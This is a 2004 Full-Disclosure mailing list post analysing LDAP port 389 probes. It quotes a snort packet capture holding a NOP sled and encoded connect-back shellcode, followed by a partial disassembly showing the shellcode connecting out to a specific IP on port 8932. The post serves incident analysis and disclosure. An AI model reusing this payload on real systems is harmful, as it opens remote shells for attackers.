(no subject)

["Disclosure From OSSI" <disclosure () ossecurity ca>]

We grabbed the binary data from the sniff'ed below. After a quick reverse,
it turns out to be a connect-back shellcode with back server p->
24.19.147.225.

Partially disassembled:
00000084 68 18 13 93 E1                          push    0E1931318h
00000089 68 02 00 22 E4                          push    0E4220002h
0000008E 8B CC                                   mov     ecx, esp
00000090 6A 10                                   push    10h
00000092 51                                      push    ecx
00000093 FF 76 24                                push    dword ptr [esi+24h]
00000096 FF D0                                   call    eax

 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
The following info was automatically generated by "OSAnalyzer" program.
 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

      call  eax=776ba5a3
      776ba5a3 = WS2_32.dll!connect with para 3
      Para 0 is socket # 00000094
      Para 1 is name p-> 00dafcc4
      Para 2 is namelen  00000010
      sin_family AF_INET     , port 8932 IP 24.19.147.225
      call external 776ba5a3 stack 0000000c return ffffffff

; =================== a quick translation =================================
C:\TEMP>ping -a 24.19.147.225

Pinging c-24-19-147-225.client.comcast.net [24.19.147.225] with 32 bytes of
data

Hope the info is useful to you.

Regards

Peter Huang
Peter.Huang AT ossecurity.ca
http://www.ossecurity.ca/

> Date: Wed, 25 Feb 2004 08:46:26 -0800
> From: John Sage <jsage () finchhaven com>
> To: full-disclosure () lists netsys com
> Subject: Re: [Full-disclosure] Probes on port 389
>
> Just picked this up:
>
> On Tue, Feb 24, 2004 at 11:06:50AM -0600, Schmehl, Paul L wrote:
> > From: "Schmehl, Paul L" <pauls () utdallas edu>
> > To: <intrusion () sans org>, <full-disclosure () lists netsys com>
> > Subject: [Full-disclosure] Probes on port 389
> > Date: Tue, 24 Feb 2004 11:06:50 -0600
> >
> > I threw up a quick rule on snort to monitor probes on port 389 because I
> > have been seeing entries in /var/log/messages on some boxes that I am
> > responsible for.  This morning we had a probe that hit 26205 different
> > IPs on that port in about 7 minutes (SYN scan only - no payload.)  The
> > source IP was a mailserver in England.  (They've been notified.)
>
> /* snip */
>
> input: snort.log.1077660886
> filter: ip and ( src host 24.6.176.211 )
> #
> T 2004/02/25 08:08:15.042588 24.6.176.211:220 -> 24.19.147.xxx:389 [S]
> #
> T 2004/02/25 08:08:15.092297 24.6.176.211:220 -> 24.19.147.xxx:389 [R]
> #
> T 2004/02/25 08:08:15.097128 24.6.176.211:2211 -> 24.19.147.xxx:389 [S]
> #
> T 2004/02/25 08:08:15.146174 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
> #
> T 2004/02/25 08:08:15.154158 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
>   30 82 0a 3d 02 01 01 60    82 01 36 02 ff ff ff ff    0..=...`..6.....
>   50 a9 f7 00 10 13 90 90    90 90 90 90 90 90 90 90    P...............
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 eb 02 eb 05 e8 f9 ff    ................
>   ff ff 5b 80 c3 10 33 c9    66 b9 33 01 80 33 95 43    ..[...3.f.3..3.C
>   e2 fa 14 79 05 94 95 95    1e 61 c0 c3 f1 34 a5 95    ...y.....a...4..
>   95 95 1e d5 99 1e e5 89    38 1e fd 9d 7e 95 1e 50    ........8...~..P
>   cb c8 1c 93 6a a3 fd 1b    db 9b 79 7d 38 95 95 95    ....j.....y}8...
>   fd a6 a7 95 95 fd e2 e6    a7 ca c1 6a 45 1e 6d c2    ...........jE.m.
>   fd 4c 9c 60 38 7d 06 95    95 95 a6 5c c4 c4 c4 c4    .L.`8}.....\....
>   d4 c4 d4 c4 6a 45 1c d3    b1 c2 fd 79 6c 3f f5 7d    ....jE.....yl?.}
>   ec 95 95 95 fd 8d 86 06    74 fd 97 95 b7 71 1e 59    ........t....q.Y
>   ff 85 c4 6a e3 b1 6a 45    fd f6 f8 f1 95 1c f3 a5    ...j..jE........
>   6a a3 fd e7 6b 26 83 7d    c4 95 95 95 1c d3 8b 16    j...k&.}........
>   79 c1 18 a9 b1 a6 55 a6    5c 16 54 80 3e 77 68 53    y.....U.\.T.>whS
>   d1 b1 85 d1 6b d1 b1 a8    6b d1 b1 a9 1e d3 b1 1c    ....k...k.......
>   d1 b1 dd 1c d1 b1 d9 1c    d1 b1 c5 18 d1 b1 85 c1    ................
>   c5 c4 c4 c4 ff 94 c4 c4    6a e3 a5 c4 6a c3 8b 6a    ........j...j..j
>   a3 fd 7a 5b 75 f5 7d 97    95 95 95 6a 45 c6 c0 c3    ..z[u.}....jE...
>   c2 1e f9 b1 8d 1e d0 a9    1e c1 90 ed 96 40 1e df    .............@..
>   8d 1e cf b5 96 48 76 a7    dc 1e a1 1e 96 60 a6 6a    .....Hv......`.j
>   69 a6 55 39 af 51 e1 92    54 5a 98 96 6d 7e 67 ae    i.U9.Q..TZ..m~g.
>   e9 b1 81 e0 74 1e cf b1    96 48 f3 1e 99 de 1e cf    ....t....H......
>   89 96 48 1e 91 1e 96 50    7e 97 a6 55 1e 40 ca cb    ..H....P~..U.@..
>   c8 ce 57 91 95 90 90 90    90 90 90 90 90 90 90 90    ..W.............

... deleted ...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html